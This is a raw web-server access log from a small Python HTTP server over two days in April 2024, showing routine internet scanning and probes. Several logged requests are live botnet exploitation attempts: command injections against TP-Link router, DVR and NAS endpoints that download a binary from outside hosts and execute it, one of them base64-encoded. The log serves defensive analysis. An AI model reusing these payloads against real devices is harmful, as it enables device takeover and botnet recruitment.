07:48:59] code 404, message File not found 192.241.225.76 - - [18/Apr/2024 07:48:59] "GET /hudson HTTP/1.1" 404 - 78.153.140.177 - - [18/Apr/2024 07:49:19] code 404, message File not found 78.153.140.177 - - [18/Apr/2024 07:49:19] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [18/Apr/2024 07:49:22] code 400, message Bad request version ('&J\\x88|\\x16é\\x87>XNyn¿T°\\x1a\\x1b#X') 78.153.140.177 - - [18/Apr/2024 07:49:22] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03¨x=KZ [Ù\x14\x11öì'a=©À\x97UòpñZw\x1a°!\x1bèä\x9fý &J\x88|\x16é\x87>XNyn¿T°\x1a\x1b#X" 400 - 198.235.24.249 - - [18/Apr/2024 07:57:05] "GET / HTTP/1.0" 200 - 184.105.139.67 - - [18/Apr/2024 08:10:11] code 400, message Bad request version ('À\\x14À') 184.105.139.67 - - [18/Apr/2024 08:10:11] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03¼\x11á\x7fºvG\x90(\x8a\x93\x81á\x92lÄÅ\x88\x92ݵ¬åŲ\x1e8\x01\x01\x11\x0e¤\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 185.224.128.43 - - [18/Apr/2024 08:10:30] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [18/Apr/2024 08:20:37] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [18/Apr/2024 08:20:37] "CONNECT google.com:443 HTTP/1.1" 501 - 162.120.71.104 - - [18/Apr/2024 08:37:02] code 404, message File not found 162.120.71.104 - - [18/Apr/2024 08:37:02] "GET /.env HTTP/1.1" 404 - 162.120.71.104 - - [18/Apr/2024 08:37:03] code 501, message Unsupported method ('POST') 162.120.71.104 - - [18/Apr/2024 08:37:03] "POST / HTTP/1.1" 501 - 198.235.24.75 - - [18/Apr/2024 09:04:10] code 400, message Bad request version ('À\\x13À') 198.235.24.75 - - [18/Apr/2024 09:04:10] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03Ü\x97\x11*Í?\x96Q©É\x0dÐè³\x13Ps\x1bÏ7¨*\x8fåHæ{¶gôÍ\x9a \x03¾3Àñ¸î£vê4Ñet3Åfº\x8f\x92AäF\x1a\x9d|ýtmàÚ\\x8c\\x07\\x90«2\\x9ct£/\\x10~Nï\\x0fÃÕý') 165.154.163.113 - - [18/Apr/2024 13:20:25] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03ã·n\x035Ëg\x8f\x9e>ýtmàÚ\x8c\x07\x90«2\x9ct£/\x10~Nï\x0fÃÕý h\\!W§x\x92\x8anHìhË47J" 400 - 165.154.163.113 - - [18/Apr/2024 13:20:25] code 400, message Bad HTTP/0.9 request type ('t3') 165.154.163.113 - - [18/Apr/2024 13:20:25] "t3 12.1.2" 400 - 185.224.128.43 - - [18/Apr/2024 13:22:30] "GET / HTTP/1.1" 200 - 45.142.182.118 - - [18/Apr/2024 14:07:18] "GET / HTTP/1.1" 200 - 194.165.16.76 - - [18/Apr/2024 14:11:43] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.165.16.76 - - [18/Apr/2024 14:11:43] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 115.231.78.9 - - [18/Apr/2024 14:26:24] "GET / HTTP/1.1" 200 - 115.231.78.9 - - [18/Apr/2024 14:26:25] "GET / HTTP/1.1" 200 - 115.231.78.9 - - [18/Apr/2024 14:26:26] code 404, message File not found 115.231.78.9 - - [18/Apr/2024 14:26:26] "GET /favicon.ico HTTP/1.1" 404 - 115.231.78.9 - - [18/Apr/2024 14:26:26] code 404, message File not found 115.231.78.9 - - [18/Apr/2024 14:26:26] "GET /robots.txt HTTP/1.1" 404 - 179.43.190.218 - - [18/Apr/2024 14:34:13] code 404, message File not found 179.43.190.218 - - [18/Apr/2024 14:34:13] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 87.121.69.52 - - [18/Apr/2024 14:42:08] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [18/Apr/2024 14:42:08] "CONNECT google.com:443 HTTP/1.1" 501 - 64.225.31.186 - - [18/Apr/2024 15:41:31] "GET / HTTP/1.0" 200 - 66.240.205.34 - - [18/Apr/2024 15:56:23] code 400, message Bad request version ("x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==") 66.240.205.34 - - [18/Apr/2024 15:56:23] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 - 64.225.31.186 - - [18/Apr/2024 15:59:41] "GET / HTTP/1.1" 200 - 64.225.31.186 - - [18/Apr/2024 15:59:42] code 404, message File not found 64.225.31.186 - - [18/Apr/2024 15:59:42] "GET /favicon.ico HTTP/1.1" 404 - 164.52.0.94 - - [18/Apr/2024 16:15:17] code 400, message Bad request version ("{ÌÊ!û\\x00>\\x13\\x02\\x13\\x03\\x13\\x01À,À0\\x00\\x9f̨̩̪À+À/\\x00\\x9eÀ$À(\\x00kÀ#À'\\x00gÀ") 164.52.0.94 - - [18/Apr/2024 16:15:17] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03)¶Uëá\x9cI.\x08åå¦8(Ëg:Z\x88¼wØ8XeBØ ¨\x83+\x0b °ªz\x04\x9aüP\x99W\x94Ý2\x9díÆ\x1dØZvÏJ\x02n~=\x06\x1d{ÌÊ!û\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 164.52.0.94 - - [18/Apr/2024 16:15:54] "GET / HTTP/1.1" 200 - 164.52.0.94 - - [18/Apr/2024 16:16:28] code 404, message File not found 164.52.0.94 - - [18/Apr/2024 16:16:28] "GET /favicon.ico HTTP/1.1" 404 - 45.142.182.118 - - [18/Apr/2024 16:37:44] "GET / HTTP/1.1" 200 - 64.62.197.82 - - [18/Apr/2024 16:39:19] "GET / HTTP/1.1" 200 - 64.62.197.84 - - [18/Apr/2024 16:41:33] code 404, message File not found 64.62.197.84 - - [18/Apr/2024 16:41:33] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.90 - - [18/Apr/2024 16:42:08] code 404, message File not found 64.62.197.90 - - [18/Apr/2024 16:42:08] "GET /geoserver/web/ HTTP/1.1" 404 - 102.129.232.53 - - [18/Apr/2024 16:57:11] "HEAD / HTTP/1.1" 200 - 43.153.9.176 - - [18/Apr/2024 18:50:09] "GET / HTTP/1.1" 200 - 123.160.221.132 - - [18/Apr/2024 18:50:31] "GET / HTTP/1.1" 200 - 107.170.208.25 - - [18/Apr/2024 18:50:59] code 404, message File not found 107.170.208.25 - - [18/Apr/2024 18:50:59] "GET /ReportServer HTTP/1.1" 404 - 185.224.128.43 - - [18/Apr/2024 18:55:15] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [18/Apr/2024 19:06:32] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 179.43.190.218 - - [18/Apr/2024 19:18:28] code 404, message File not found 179.43.190.218 - - [18/Apr/2024 19:18:28] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.180.143.49 - - [18/Apr/2024 19:48:28] "GET / HTTP/1.1" 200 - 185.180.143.49 - - [18/Apr/2024 19:48:29] code 404, message File not found 185.180.143.49 - - [18/Apr/2024 19:48:29] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 87.121.69.52 - - [18/Apr/2024 20:06:57] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [18/Apr/2024 20:06:57] "CONNECT google.com:443 HTTP/1.1" 501 - 45.125.66.34 - - [18/Apr/2024 20:27:39] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [18/Apr/2024 20:27:39] "CONNECT google.com:443 HTTP/1.1" 501 - 65.49.1.36 - - [18/Apr/2024 20:29:29] code 400, message Bad request version ('À\\x14À') 65.49.1.36 - - [18/Apr/2024 20:29:29] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03s¼NÁIOÄ\x85ª¢\x02ký\x0eâX\x95Î'nIçê\x0c<º\x03Æ)³xª\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 83.97.73.245 - - [18/Apr/2024 20:31:52] code 404, message File not found 83.97.73.245 - - [18/Apr/2024 20:31:52] "GET /actuator/gateway/routes HTTP/1.1" 404 - 3.101.240.166 - - [18/Apr/2024 20:50:26] "HEAD / HTTP/1.1" 200 - 3.101.240.129 - - [18/Apr/2024 20:50:45] "HEAD / HTTP/1.1" 200 - 192.241.217.37 - - [18/Apr/2024 21:19:31] code 404, message File not found 192.241.217.37 - - [18/Apr/2024 21:19:31] "GET /manager/html HTTP/1.1" 404 - 192.241.200.65 - - [18/Apr/2024 21:24:57] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 192.241.200.65 - - [18/Apr/2024 21:24:57] "MGLNDD_203.219.129.101_80" 400 - 46.174.191.29 - - [18/Apr/2024 21:41:10] "GET / HTTP/1.0" 200 - 80.75.212.75 - - [18/Apr/2024 21:51:12] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [18/Apr/2024 21:51:12] "CONNECT www.google.com:443 HTTP/1.1" 501 - 185.242.226.99 - - [18/Apr/2024 22:22:53] "GET / HTTP/1.1" 200 - 35.187.98.121 - - [18/Apr/2024 23:32:04] "GET / HTTP/1.1" 200 - 45.128.232.129 - - [18/Apr/2024 23:49:56] "GET / HTTP/1.0" 200 - 194.50.16.190 - - [18/Apr/2024 23:59:51] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [19/Apr/2024 00:25:28] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [19/Apr/2024 01:19:40] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 01:19:40] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 45.142.182.118 - - [19/Apr/2024 01:26:27] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [19/Apr/2024 01:27:36] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [19/Apr/2024 01:29:43] code 501, message Unsupported method ('POST') 80.94.92.60 - - [19/Apr/2024 01:29:43] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3Bcd%20%2Fvar%2Ftmp%3Bwget%20http%3A%2F%2F94.156.79.129%2Farm7%3Bchmod%20777%20arm7%3B%20.%2Farm7%200daydvr%3B HTTP/1.1" 501 - 118.26.36.40 - - [19/Apr/2024 02:01:23] "GET / HTTP/1.1" 200 - 118.26.36.40 - - [19/Apr/2024 02:01:23] code 404, message File not found 118.26.36.40 - - [19/Apr/2024 02:01:23] "GET /favicon.ico HTTP/1.1" 404 - 118.26.36.40 - - [19/Apr/2024 02:01:24] code 404, message File not found 118.26.36.40 - - [19/Apr/2024 02:01:24] "GET /sitemap.xml HTTP/1.1" 404 - 118.26.36.40 - - [19/Apr/2024 02:01:24] code 404, message File not found 118.26.36.40 - - [19/Apr/2024 02:01:24] "GET /robots.txt HTTP/1.1" 404 - 87.121.69.52 - - [19/Apr/2024 02:21:46] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [19/Apr/2024 02:21:46] "CONNECT google.com:443 HTTP/1.1" 501 - 80.75.212.75 - - [19/Apr/2024 03:38:28] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [19/Apr/2024 03:38:28] "CONNECT www.google.com:443 HTTP/1.1" 501 - 179.43.190.218 - - [19/Apr/2024 03:45:48] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 03:45:48] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 183.160.195.61 - - [19/Apr/2024 04:55:23] "GET / HTTP/1.1" 200 - 150.255.88.181 - - [19/Apr/2024 04:55:25] "GET / HTTP/1.1" 200 - 220.197.51.149 - - [19/Apr/2024 04:55:28] code 404, message File not found 220.197.51.149 - - [19/Apr/2024 04:55:28] "GET /favicon.ico HTTP/1.1" 404 - 185.224.128.43 - - [19/Apr/2024 05:15:52] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [19/Apr/2024 05:26:34] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 05:26:34] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.191.126.213 - - [19/Apr/2024 05:34:33] "GET / HTTP/1.1" 200 - 165.154.206.35 - - [19/Apr/2024 05:41:04] "GET / HTTP/1.1" 200 - 106.75.167.59 - - [19/Apr/2024 05:58:08] "GET / HTTP/1.1" 200 - 106.75.167.59 - - [19/Apr/2024 05:58:08] code 404, message File not found 106.75.167.59 - - [19/Apr/2024 05:58:08] "GET /favicon.ico HTTP/1.1" 404 - 106.75.173.226 - - [19/Apr/2024 06:00:15] code 404, message File not found 106.75.173.226 - - [19/Apr/2024 06:00:15] "GET /.DS_Store HTTP/1.1" 404 - 109.205.213.198 - - [19/Apr/2024 06:46:05] "GET / HTTP/1.1" 200 - 37.49.227.60 - - [19/Apr/2024 07:46:35] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [19/Apr/2024 07:57:03] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 07:57:03] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 205.210.31.186 - - [19/Apr/2024 08:42:01] code 400, message Bad request version ('À\\x13À') 205.210.31.186 - - [19/Apr/2024 08:42:01] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03Ûªæ»XÀÑߺäSIfü\x80\x96qÃè\x99\x91MÖ\x00í\x9dZ mÝ \x15 \x0c\x19\x92\x0b\x09cI\x15ñå®AâQ²iÚ \x0d¶-\x0c\x95.©B:Ògô\x18©\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 205.210.31.186 - - [19/Apr/2024 08:42:02] code 400, message Bad request version ('À(À$À\\x14À') 205.210.31.186 - - [19/Apr/2024 08:42:02] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03uð\x97¬\x80M\x18Oº.\x85íe\x8bq\x9e\x1cÿ\x08\x05µ7¾w5¹ÕZ××\x1c6\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 222.216.206.99 - - [19/Apr/2024 09:04:19] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [19/Apr/2024 09:12:34] code 404, message File not found 5.181.190.250 - - [19/Apr/2024 09:12:34] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 205.210.31.252 - - [19/Apr/2024 09:27:12] "GET / HTTP/1.0" 200 - 116.198.40.76 - - [19/Apr/2024 09:36:45] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [19/Apr/2024 10:28:41] "GET / HTTP/1.1" 200 - 205.210.31.240 - - [19/Apr/2024 11:06:42] "GET / HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 11:33:58] "GET / HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 11:34:00] "GET /images/ HTTP/1.1" 200 - 45.125.66.34 - - [19/Apr/2024 11:38:34] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [19/Apr/2024 11:38:34] "CONNECT google.com:443 HTTP/1.1" 501 - 179.43.190.218 - - [19/Apr/2024 11:44:34] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 11:44:34] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.161.248.199 - - [19/Apr/2024 11:55:25] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [19/Apr/2024 11:56:04] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [19/Apr/2024 11:56:04] "CONNECT www.google.com:443 HTTP/1.1" 501 - 45.79.128.205 - - [19/Apr/2024 12:13:58] code 400, message Bad request version ('À\\x14À') 45.79.128.205 - - [19/Apr/2024 12:13:58] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03P_\x98ÐÊ\x8a\x98U\x1dª^· ýAF5¬¢Tú=«º\\%£x\x86·Åë\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 192.241.193.124 - - [19/Apr/2024 12:39:39] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [19/Apr/2024 13:05:00] code 404, message File not found 5.181.190.250 - - [19/Apr/2024 13:05:00] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 192.241.209.25 - - [19/Apr/2024 14:31:11] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 192.241.209.25 - - [19/Apr/2024 14:31:11] "MGLNDD_203.219.129.101_80" 400 - 80.94.92.60 - - [19/Apr/2024 14:34:25] code 501, message Unsupported method ('POST') 80.94.92.60 - - [19/Apr/2024 14:34:25] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3Bcd%20%2Fvar%2Ftmp%3Bwget%20http%3A%2F%2F94.156.79.129%2Farm7%3Bchmod%20777%20arm7%3B%20.%2Farm7%200daydvr%3B HTTP/1.1" 501 - 185.224.128.43 - - [19/Apr/2024 14:46:23] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [19/Apr/2024 15:02:29] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 15:02:29] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 106.75.18.235 - - [19/Apr/2024 15:11:57] code 404, message File not found 106.75.18.235 - - [19/Apr/2024 15:11:57] "GET /.vscode/sftp.json HTTP/1.1" 404 - 64.62.156.110 - - [19/Apr/2024 15:34:59] code 400, message Bad request version ('À\\x14À') 64.62.156.110 - - [19/Apr/2024 15:34:59] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03ãFn\x18âm\x89â\x8aò·%\x9c᥸\x19^ÀE¼r\x09¿ü\x00Î8ÊDÀ\x9a\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 80.94.92.60 - - [19/Apr/2024 15:35:48] code 501, message Unsupported method ('POST') 80.94.92.60 - - [19/Apr/2024 15:35:48] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3Bcd%20%2Fvar%2Ftmp%3Bwget%20http%3A%2F%2F94.156.79.129%2Farm7%3Bchmod%20777%20arm7%3B%20.%2Farm7%200daydvr%3B HTTP/1.1" 501 - 80.66.76.130 - - [19/Apr/2024 15:50:18] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 80.66.76.130 - - [19/Apr/2024 15:50:18] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 162.216.150.148 - - [19/Apr/2024 16:18:00] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [19/Apr/2024 16:36:30] code 404, message File not found 179.43.190.218 - - [19/Apr/2024 16:36:30] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.94.92.60 - - [19/Apr/2024 16:47:31] code 404, message File not found 80.94.92.60 - - [19/Apr/2024 16:47:31] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cm0JLXJmCWxvbAl8CXdnZXQJLU8tCWh0dHA6Ly85NC4xNTYuNzkuMTI5L2xvbHxzaA== HTTP/1.1" 404 - 193.106.29.125 - - [19/Apr/2024 17:02:06] "GET / HTTP/1.0" 200 - 185.191.126.213 - - [19/Apr/2024 17:32:39] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('199.45.154.70', 48858) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 199.45.154.70 - - [19/Apr/2024 17:38:02] "GET / HTTP/1.1" 200 - 199.45.154.70 - - [19/Apr/2024 17:38:06] "GET / HTTP/1.1" 200 - 199.45.154.70 - - [19/Apr/2024 17:38:06] code 505, message Invalid HTTP version (2.0) 199.45.154.70 - - [19/Apr/2024 17:38:06] "PRI * HTTP/2.0" 505 - 199.45.154.70 - - [19/Apr/2024 17:38:07] code 404, message File not found 199.45.154.70 - - [19/Apr/2024 17:38:07] "GET /favicon.ico HTTP/1.1" 404 - 106.75.173.226 - - [19/Apr/2024 17:41:37] code 404, message File not found 106.75.173.226 - - [19/Apr/2024 17:41:37] "GET /.git/config HTTP/1.1" 404 - 34.79.162.186 - - [19/Apr/2024 17:56:46] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [19/Apr/2024 17:59:23] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [19/Apr/2024 17:59:23] "CONNECT www.google.com:443 HTTP/1.1" 501 - 139.162.201.182 - - [19/Apr/2024 18:02:44] "GET / HTTP/1.1" 200 - 139.162.201.182 - - [19/Apr/2024 18:02:44] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00ü\\x01\\x00\\x00ø\\x03\\x03Ë\\x11ÛÌ\\x08ö\\x9aòïVà%!\\x93Kë®ZÛ~J\\x8d÷ÛÑ!\\x13v¸\\x02r)') 139.162.201.182 - - [19/Apr/2024 18:02:44] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03Ë\x11ÛÌ\x08ö\x9aòïVà%!\x93Kë®ZÛ~J\x8d÷ÛÑ!\x13v¸\x02r) \x17êÅ~2±*\x96¿ÐtÒf" 400 - 139.162.201.182 - - [19/Apr/2024 18:02:45] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00ü\\x01\\x00\\x00ø\\x03\\x03NKì5ï') 139.162.201.182 - - [19/Apr/2024 18:02:45] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03NKì5ï\x0d»+[" 400 - 139.162.201.182 - - [19/Apr/2024 18:02:45] code 400, message Bad request version ('r\\x94aÓ\\x17') 139.162.201.182 - - [19/Apr/2024 18:02:45] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03XÞ\x8f\x7f´nå¡'qYò6¢i¬^ï|ýöB\x1cã\x1dr\x94aÓ\x17" 400 - 216.218.206.68 - - [19/Apr/2024 18:08:33] "GET / HTTP/1.1" 200 - 216.218.206.68 - - [19/Apr/2024 18:11:53] code 404, message File not found 216.218.206.68 - - [19/Apr/2024 18:11:53] "GET /favicon.ico HTTP/1.1" 404 - 216.218.206.68 - - [19/Apr/2024 18:12:58] code 404, message File not found 216.218.206.68 - - [19/Apr/2024 18:12:58] "GET /geoserver/web/ HTTP/1.1" 404 - 109.205.213.198 - - [19/Apr/2024 18:30:29] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [19/Apr/2024 18:48:07] code 404, message File not found 5.181.190.250 - - [19/Apr/2024 18:48:07] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 35.203.211.170 - - [19/Apr/2024 19:45:26] "GET / HTTP/1.1" 200 - 5.181.190.250 - - [19/Apr/2024 20:05:30] code 404, message File not found 5.181.190.250 - - [19/Apr/2024 20:05:30] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.224.128.43 - - [19/Apr/2024 20:13:17] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [19/Apr/2024 20:18:15] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [19/Apr/2024 20:18:15] "CONNECT google.com:443 HTTP/1.1" 501 - 91.191.209.202 - - [19/Apr/2024 21:05:05] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 91.191.209.202 - - [19/Apr/2024 21:05:05] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 193.105.134.40 - - [19/Apr/2024 21:14:49] "GET / HTTP/1.1" 200 - 46.174.191.28 - - [19/Apr/2024 21:31:02] "GET / HTTP/1.0" 200 - 45.128.232.229 - - [19/Apr/2024 21:38:40] "GET / HTTP/1.1" 200 - 45.125.66.34 - - [19/Apr/2024 22:09:06] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [19/Apr/2024 22:09:06] "CONNECT google.com:443 HTTP/1.1" 501 - 193.105.134.40 - - [19/Apr/2024 22:09:35] "GET / HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:09:55] "GET /ftpscraper.py HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:10:17] "GET /IDR714.T.202401170639.png HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:10:46] "GET /IDR714.T.202404050819.png HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:10:56] "GET /images/ HTTP/1.1" 200 - 193.105.134.40 - - [19/Apr/2024 22:11:12] "GET /scraper-log.txt HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('193.105.134.40', 48688) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 420, in handle_one_request method() File "/usr/lib/python3.11/http/server.py", line 674, in do_GET self.copyfile(f, self.wfile) File "/usr/lib/python3.11/http/server.py", line 873, in copyfile shutil.copyfileobj(source, outputfile) File "/usr/lib/python3.11/shutil.py", line 200, in copyfileobj 